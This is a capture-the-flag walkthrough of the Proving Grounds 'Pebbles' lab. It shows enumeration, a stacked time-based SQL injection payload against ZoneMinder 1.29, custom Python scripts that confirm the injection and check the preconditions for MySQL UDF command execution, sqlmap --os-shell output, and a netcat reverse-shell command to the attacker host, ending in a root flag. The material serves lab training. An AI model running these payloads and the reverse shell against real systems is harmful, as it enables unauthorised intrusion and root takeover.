Pebbles
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 02:25 EST
Nmap scan report for 192.168.215.52
Host is up, received reset ttl 61 (0.23s latency).
Scanned at 2025-11-07 02:25:03 EST for 52s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
| 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>
Five ports are open: FTP (vsftpd 3.0.3) on 21, SSH on 22, and Apache 2.4.18 serving HTTP on 80, 3305 and 8080. The three web ports are the obvious place to start.
HTTP (8080):

Just the Tomcat welcome page, with nothing functional behind it.
HTTP (3305):

Only the Apache2 Ubuntu default page ("It works"), so nothing to do here either.
HTTP (80):

I tried default credentials and SQL injection, but nothing worked.
Let's try directory fuzzing:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ gobuster dir -u http://192.168.215.52/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.215.52/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/cgi-bin/ (Status: 403) [Size: 279]
/cgi-bin/.php (Status: 403) [Size: 279]
/css (Status: 301) [Size: 314] [--> http://192.168.215.52/css/]
/images (Status: 301) [Size: 317] [--> http://192.168.215.52/images/]
/index.php (Status: 200) [Size: 1134]
/javascript (Status: 301) [Size: 321] [--> http://192.168.215.52/javascript/]
/server-status (Status: 403) [Size: 279]
/zm (Status: 301) [Size: 313] [--> http://192.168.215.52/zm/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================
We find an unusual directory named zm; let's browse to it:

The directory hosts ZoneMinder, an open-source CCTV/video surveillance web application, with its version, 1.29, exposed on the page.
Exploitation:
Let's search for a public exploit for that version:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ searchsploit zoneminder 1.29
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery | php/webapps/41239.txt
ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE | php/webapps/51902.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Copy the first one, which matches our version:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ searchsploit -m php/webapps/41239.txt
Exploit: Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
URL: https://www.exploit-db.com/exploits/41239
Path: /usr/share/exploitdb/exploits/php/webapps/41239.txt
Codes: N/A
Verified: False
File Type: HTML document, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Pebbles/41239.txt
Let's inspect the file to see what it contains:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ cat 41239.txt
<snipped>
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.
The payload terminates ZoneMinder's own log query with ';', stacks a second SELECT that calls SLEEP(5), and comments out whatever the application appends with '#'. Nothing from the stacked query is returned to the client, so the only signal is the response time, which is why the advisory classes it as a stacked, time-based injection. Let's use sqlmap to find the injection point and, if the database user turns out to be privileged enough, exploit it to get a shell on the target:
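Before handing the parameters to sqlmap it is worth confirming the delay by hand, because a time-based check against a laggy VPN link produces false positives and sqlmap's 2326-request run depends on the same timing signal. The script below is an added example for this writeup, not code from ZoneMinder, the advisory or sqlmap. TARGET is an assumption copied from the sqlmap command used here (the writeup targets port 8080 even though gobuster found /zm on 80; change the port if the application only answers on 80). No session cookie is sent, matching the sqlmap invocation.

```python
"""Manually confirm the stacked, time-based blind SQL injection in the
ZoneMinder log query (POST parameter 'limit') from EDB-41239.

Added example for this writeup, not ZoneMinder or sqlmap code.
TARGET is an assumption taken from the writeup's sqlmap command.
"""
import time
import urllib.parse
import urllib.request
from typing import Callable

TARGET = "http://192.168.215.52:8080/zm/index.php"  # assumption: host/port/path from the writeup


def build_body(sleep_seconds: int, limit: int = 100) -> bytes:
    """Form-encode the log-query request with a stacked SLEEP() appended to 'limit'.

    ';' ends ZoneMinder's own statement, the subquery wrapper keeps the stacked
    SELECT syntactically valid, and '#' comments out whatever the application
    appends after the limit clause.  urlencode() turns '#' into '%23' so it is
    sent to the server instead of being treated as a URL fragment.
    """
    stacked = f"{limit};(SELECT * FROM (SELECT(SLEEP({sleep_seconds})))x)#"
    params = {
        "view": "request",
        "request": "log",
        "task": "query",
        "limit": stacked,
        "minTime": "5",
    }
    return urllib.parse.urlencode(params).encode()


def http_send(body: bytes, url: str = TARGET, timeout: float = 30.0) -> float:
    """POST the body and return the round-trip time in seconds."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()
    return time.monotonic() - start


def is_delayed(baseline: float, delayed: float, sleep_seconds: int,
               tolerance: float = 0.8) -> bool:
    """True if the SLEEP() request took at least `tolerance` of the requested
    delay longer than the baseline; the slack absorbs network jitter, which is
    the reason behind sqlmap's warning about not stressing the link."""
    return (delayed - baseline) >= sleep_seconds * tolerance


def confirm_injection(send: Callable[[bytes], float] = http_send,
                      sleep_seconds: int = 5, trials: int = 2) -> bool:
    """Compare SLEEP(0) against SLEEP(n) timings over several trials.

    Every trial must show the delay, so a single slow response cannot be
    mistaken for an injection.  `send` is injectable for offline testing.
    """
    for _ in range(trials):
        baseline = send(build_body(0))
        delayed = send(build_body(sleep_seconds))
        if not is_delayed(baseline, delayed, sleep_seconds):
            return False
    return True


if __name__ == "__main__":
    print("limit is time-based injectable:", confirm_injection())
```

If the delay reproduces on every trial, the sqlmap run below is doing the same comparison per extracted bit, which is why it needs thousands of requests and why its 1-second delay optimisation only pays off on a quiet link.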
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ sqlmap http://192.168.215.52:8080/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
___
__H__
___ ___[(]_____ ___ ___ {1.9.10#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<snipped>
[02:46:52] [INFO] POST parameter 'limit' appears to be 'MySQL >= 5.0.12 stacked queries (comment)'' injectable
<snipped>
sqlmap identified the following injection point(s) with a total of 2326 HTTP(s) requests:
---
Parameter: limit (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5
---
[02:47:57] [INFO] the back-end DBMS is MySQL
[02:47:57] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:47:58] [INFO] fingerprinting the back-end DBMS operating system
[02:47:58] [INFO] the back-end DBMS operating system is Linux
[02:47:59] [INFO] testing if current user is DBA
[02:47:59] [INFO] fetching current user
[02:47:59] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[02:48:19] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
Select 2; the target is a 64-bit Ubuntu 16.04 box, and a library built for the wrong architecture would simply fail to load when CREATE FUNCTION runs:
> 2
[02:49:30] [INFO] checking if UDF 'sys_exec' already exist
[02:49:30] [INFO] checking if UDF 'sys_eval' already exist
[02:49:30] [INFO] detecting back-end DBMS version from its banner
[02:49:30] [INFO] retrieved: 5.7.30-0ubuntu0.16.0
<snipped>
[02:57:12] [INFO] the local file '/tmp/sqlmapgcef_yle12662/lib_mysqludf_sys2loln42s.so' and the remote file '/usr/lib/mysql/plugin/libsbvjw.so' have the same size (8040 B)
[02:57:13] [INFO] creating UDF 'sys_exec' from the binary UDF file
[02:57:13] [INFO] creating UDF 'sys_eval' from the binary UDF file
[02:57:14] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[02:57:14] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[04:27:52] [INFO] retrieved: root
So the MySQL server itself runs as root. The injected UDFs execute commands as the mysqld OS user, which on a default install is the unprivileged mysql account; here it is root, so the os-shell is already a root shell. sqlmap got this far because the database user is root@localhost, a DBA with the FILE privilege, which let it write the shared library into the plugin directory and register sys_exec/sys_eval with CREATE FUNCTION.
Let's upgrade to an interactive shell.
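The UDF route only works when several server-side conditions line up, and sqlmap reports failures late and vaguely. As an added example (not sqlmap or ZoneMinder code), the check below reads the output of SHOW VARIABLES, SHOW GRANTS and @@version_compile_machine, which can all be pulled through the same injection, and lists what would block the upload; it also answers sqlmap's 32/64-bit question from the server's own build information instead of guessing. The sample rows are constructed to mirror what this box reported (root@localhost, MySQL 5.7 on Ubuntu 16.04, plugin directory /usr/lib/mysql/plugin).

```python
"""Pre-flight check for the MySQL UDF command-execution route sqlmap used.

Added example, not sqlmap code.  Input is the result of:
  SHOW VARIABLES WHERE Variable_name IN
      ('secure_file_priv','plugin_dir','version','version_compile_machine');
  SHOW GRANTS;
The sample values are constructed to mirror this writeup's target.
"""
import re

# Constructed sample output mirroring the writeup's database.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",                 # empty string: writes allowed anywhere
    "plugin_dir": "/usr/lib/mysql/plugin/",
    "version": "5.7.30-0ubuntu0.16.04.1",   # assumption: full banner was snipped
    "version_compile_machine": "x86_64",
}
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT PROXY ON ''@'' TO 'root'@'localhost' WITH GRANT OPTION",
]

_GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO ", re.IGNORECASE)


def global_privileges(grants):
    """Collect privileges granted ON *.*; FILE is a global-only privilege,
    so database-scoped grants cannot supply it."""
    privs = set()
    for grant in grants:
        m = _GRANT_RE.match(grant)
        if not m or m.group("scope") != "*.*":
            continue
        for p in m.group("privs").split(","):
            privs.add(p.strip().upper())
    return privs


def udf_arch(variables):
    """Answer sqlmap's architecture prompt from the server's own build info."""
    machine = variables.get("version_compile_machine", "").lower()
    return 64 if machine in ("x86_64", "amd64", "aarch64") else 32


def udf_preconditions(variables, grants):
    """Return the list of things that would stop a UDF upload; empty means go.

    Checked: FILE for SELECT ... INTO DUMPFILE, INSERT for the mysql.func row
    that CREATE FUNCTION writes (global grants only; a db-level INSERT on
    mysql.* would also do), and secure_file_priv versus plugin_dir.  Whether
    the mysqld OS user can actually write plugin_dir cannot be seen from SQL.
    """
    problems = []
    privs = global_privileges(grants)
    if not ({"ALL PRIVILEGES", "FILE"} & privs):
        problems.append("no global FILE privilege: SELECT ... INTO DUMPFILE will fail")
    if not ({"ALL PRIVILEGES", "INSERT"} & privs):
        problems.append("no INSERT on mysql.func: CREATE FUNCTION will fail")
    sfp = variables.get("secure_file_priv")
    plugin_dir = variables.get("plugin_dir", "")
    if sfp is None:
        problems.append("secure_file_priv is NULL: server-side file writes are disabled")
    elif sfp != "" and not plugin_dir.startswith(sfp):
        problems.append(
            f"secure_file_priv limits writes to {sfp}; plugin_dir {plugin_dir} is outside it")
    return problems


if __name__ == "__main__":
    print("UDF architecture:", udf_arch(SAMPLE_VARIABLES))
    print("blockers:", udf_preconditions(SAMPLE_VARIABLES, SAMPLE_GRANTS) or "none")
```

Even with no blockers, commands only run as root because mysqld does, which is the real misconfiguration on this box. When done, drop the functions with sqlmap's --cleanup and remove the uploaded library from the plugin directory; a leftover sys_exec is a ready-made backdoor for the next person who finds the injection.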
Start a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...
os-shell> busybox nc 192.168.45.174 3305 -e bash
do you want to retrieve the command standard output? [Y/n/a] Y
[04:42:58] [INFO] retrieved:
command standard output: ' '
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.52] 54738
Here we have a connection back from the target.
Since we are already root, let's grab the root flag:
whoami
root
cd /root
ls
proof.txt
cat proof.txt
d135189cae5eef88d3fd1ce69894ec6a